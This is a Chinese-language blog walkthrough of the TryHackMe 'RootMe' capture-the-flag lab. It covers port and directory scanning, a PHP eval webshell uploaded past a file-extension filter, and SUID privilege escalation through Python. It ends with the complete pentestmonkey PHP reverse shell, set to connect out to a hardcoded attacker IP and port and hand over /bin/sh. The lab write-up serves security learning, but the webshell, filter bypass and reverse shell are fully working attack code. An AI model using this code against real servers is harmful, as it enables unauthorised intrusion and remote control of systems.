Pr1nt
Pr1nt
文章12
标签8
分类4
回到首页
文章归档
关于Pr1nt
友情链接

文章分类

文章归档

© 2024 Pr1nt Powered by Hexo & Nexmoe

本站总访问量
本站访客数人次
THM2 RootMe

THM2 RootMe

2024年02月21日 Try Hack Me 约2k字 预计需要9分钟

大晚上的,不知道干点啥,做个thm玩玩

RootMe

一打开题目,什么都没有,肯定还是老方法

1
2
nmap -sS -sV xx.xx.xx.xx --open  
dirsearch -u xx.xx.xx.xx

经典操作扫端口文件,发现一个 /uploads 路径和一个不知道啥的 /panel 路径,那必须访问上去看看啊

dir

原来uploads里装的应该是咱传上去的东西,panel才是上传接口

panel

uploads

看了一眼是php,直接传个小马先

php

1
<?php @eval($_POST['hack']);?>

上面带waf的,各种方法都绕不过去,搜了一下发现apache会从右往左解析,遇到解析不了的会跳过去,这样我们上传一个shell.php.zzz就可以成功绕过
waf1
ok

直接蚁剑连上
ok2

Flag1

翻到 www 目录直接就发现了第一个 flag
flag1
1
THM{y0u_g0t_a_sh3ll}

到这里其实都没有什么难度,第二个flag才算是学到了新的知识

Flag2

根据题目要去 /root 下找第二个flag,直接往前翻,但是因为没有权限所以没成功

quan
弹个shell准备提权,这里使用find -perm -4000搜索带有suid权限的命令,看到有个python,使用现学来的suid提权方法提权

本来我是不会提权的,练这一道题正好入门了,这里是经过大佬的博客学会了使用find命令来搜suid命令

大佬的博客https://blog.51cto.com/yttitan/6046179

这里是引用大佬的话

1
2
3
4
5
6
7
8
9
10
11
12
13
已知的可以被用来进行SUID提权的程序主要有:nmapvimfind、bash、more、less、nano、cp等,所以我们可以重点去查看一下这些程序是否被设置了SUID权限。但是挨个去查看的话,效率太低,所以这里推荐采用搜索的方式去查找系统中所有设置了SUID的程序。

搜索肯定要用到find命令,这是Linux中的一个比较复杂的命令,当然功能也非常强大。find命令之所以复杂,原因之一就是拥有众多选项。我们这里按文件权限查找,需要用到它的-perm选项。

-perm选项的基本用法很简单,格式为"-perm mode”,其中mode为所要匹配的权限。

我们通常见到的权限数字组合都是类似于755644这种形式,其实完整的权限数字组合应该是四位数,左侧最高位就是用于表示特殊权限。只不过特殊权限并不常用,所以我们平常见到的才主要是三位数字组合。

我们现在要查找的是SUID这种特殊权限,所以要使用的必然是四位数字组合。SUID对应的权限数字是4,特殊权限被放在数字组合左侧最高位,所以mode通常用4000表示。

注意,数字0表示忽略相应位置的权限,也就是说不考虑rwx权限,所以4000就表示查找被设置了SUID权限的文件,至于其它的rwx权限则根本不考虑。

执行"find -perm-4000"就可以查找出系统中所有被设置了SUID权限的文件。下面所使用的命令中2>/dev/null,表示屏蔽错误信息。因为find命令在执行过程中可能会出现一些错误信息,加上这个功能可以让显示结果更加清晰。

suid

这里没发现那几个常用的suid提权程序,但是有个python,于是可以使用python提权,看了好多wp发现都是下面这个网站里找到提权程序的https://gtfobins.github.io/

这中间其实发生了不少事,我折腾了半个小时,包括nc监听不了端口,明明续命了仍然断了被迫换靶机,蚁剑反弹shell就是不好使,换php代码找了个自动反弹shell的弹上去最后提权成功,虽然很费劲,但还是成功拿下第三道

root

flag2

THM{pr1v1l3g3_3sc4l4t10n}

总结

在这个靶机中,可以学习到使用find命令查找suid权限,学会了最基本的suid提权方法,收获了一个反弹shell的轮子

文章的最后发一下我使用的反弹shell的php代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.8.39.215';  // CHANGE THIS
$port = 9999;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
	// Fork and have the parent process exit
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}

	// Make the current process a session leader
	// Will only succeed if we forked
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	// Check for end of TCP connection
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	// Check for end of STDOUT
	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	// Wait until a command is end down $sock, or some
	// command output is available on STDOUT or STDERR
	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	// If we can read from the TCP socket, send
	// data to process's STDIN
	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	// If we can read from the process's STDOUT
	// send data down tcp connection
	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	// If we can read from the process's STDERR
	// send data down tcp connection
	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
	if (!$daemon) {
		print "$string\n";
	}
}

?>
×